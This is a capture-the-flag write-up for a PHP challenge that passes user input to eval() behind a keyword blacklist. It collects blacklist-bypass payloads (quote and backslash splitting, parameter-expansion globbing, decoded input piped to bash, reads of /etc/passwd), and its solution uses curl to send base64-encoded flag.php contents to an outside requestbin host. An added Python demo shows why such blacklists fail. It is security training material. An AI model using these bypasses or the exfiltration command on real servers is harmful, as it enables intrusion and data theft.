Source
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 18:48:03
*/
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("师傅们居然破解了前面的,那就来一个加强版吧");
    }
}
Approach
Unintended solution
These characters can be used to bypass the keyword filter:
\
'
"
See my blog for details.
Pick whichever of the following works to output the flag; if curl is unavailable, ping can be used instead.
od
nl
${PATH:${#TERM}:${SHLVL:~A}}${PATH:${#RANDOM}:${#SHLVL:~A}}
${PATH:~A}${PATH:${#RANDOM}:${#SHLVL:~A}}
/bin/cat
${HOME:${#}:${##}}???${HOME:${#}:${##}}??${HOME:${#HOSTNAME}:${#SHLVL}}
xxd
less
ca\t
ca''t
more
rev
/bin/rev
fmt
base64
/bin/base64
code=${HOME:${#}:${##}}???${HOME:${#}:${##}}?????${#RANDOM}
tac
| reverse of cat
tail
php /flag
sh /flag
| leaks the flag through the error message
paste /flag /etc/passwd
| reads two files at once
diff /flag.txt /etc/passwd
curl file:///flag
sed -n "p" /flag
bzless /flag
bzmore /flag
sort
echo "[base64==]" | base64 -d | bash
echo "[hex]" | xxd -r -p | bash
For blind extraction, ${string:start:length} can be used to slice out characters.
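As an added example that is not part of the original writeup, the following Python transcribes the challenge's preg_match() blacklist and runs it over payloads taken from this page: the backslash and empty-quote tricks listed above slip past a regex applied to the raw string, a normalizer that strips that quoting before matching catches them again, and the parameter-expansion/glob form contains no blacklisted word at all, so a blacklist cannot be made safe this way; the sample payloads and the helper names are constructed for this demonstration.

```python
import re

# The challenge's blacklist, transcribed from the page's preg_match() call
# (Python's re rather than PCRE, but this alternation behaves the same).
BLACKLIST = re.compile(
    r"system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od"
    r"|sort|tail|less|base64|rev|cut|strings|tailf|head",
    re.IGNORECASE,
)


def is_blocked_raw(payload: str) -> bool:
    """The page's check: the regex is applied to the raw request string."""
    return BLACKLIST.search(payload) is not None


def normalize_shell_quoting(payload: str) -> str:
    """Undo the quoting tricks the writeup lists: a backslash before a letter
    and empty '' / "" pairs are no-ops to the shell but split the word the
    regex is looking for.  Removing them before matching restores the word."""
    without_empty_quotes = payload.replace("''", "").replace('""', "")
    return re.sub(r"\\(.)", r"\1", without_empty_quotes)


def is_blocked_normalized(payload: str) -> bool:
    """Same blacklist, applied after normalizing shell quoting."""
    return BLACKLIST.search(normalize_shell_quoting(payload)) is not None


# Constructed test inputs taken from this writeup -> expected normalized verdict.
SAMPLES = {
    "ca\\t flag.php": True,   # backslash-split word: hidden from the raw check
    "ca''t": True,            # empty-quote-split word: same
    "cu\\rl": True,
    "cat": True,              # plain word: both checks block it
    # Parameter expansion / globbing from the page: no blacklisted word
    # appears at all, so even the normalized check lets it through.
    "${HOME:${#}:${##}}???${HOME:${#}:${##}}?????${#RANDOM}": False,
}


def compare_checks() -> dict:
    """Return {payload: (raw_blocked, normalized_blocked)} for every sample."""
    return {p: (is_blocked_raw(p), is_blocked_normalized(p)) for p in SAMPLES}


if __name__ == "__main__":
    for payload, (raw, norm) in compare_checks().items():
        print(f"{payload!r:60} raw={raw!s:5} normalized={norm}")
```

The last sample is the real lesson: once the payload no longer needs any of the listed words, no amount of normalizing rescues a blacklist in front of eval(), so the fix is to stop passing user input to eval() or the shell at all.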
Solution
cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag | bas\e64`
cu\rl https://requestbin.net/r/d6dln1sn?q=`ca\t flag.php | gr\ep flag2 | bas\e64`
Just piece the two halves together.
Summary
Master Y1ng yyds (forever the best).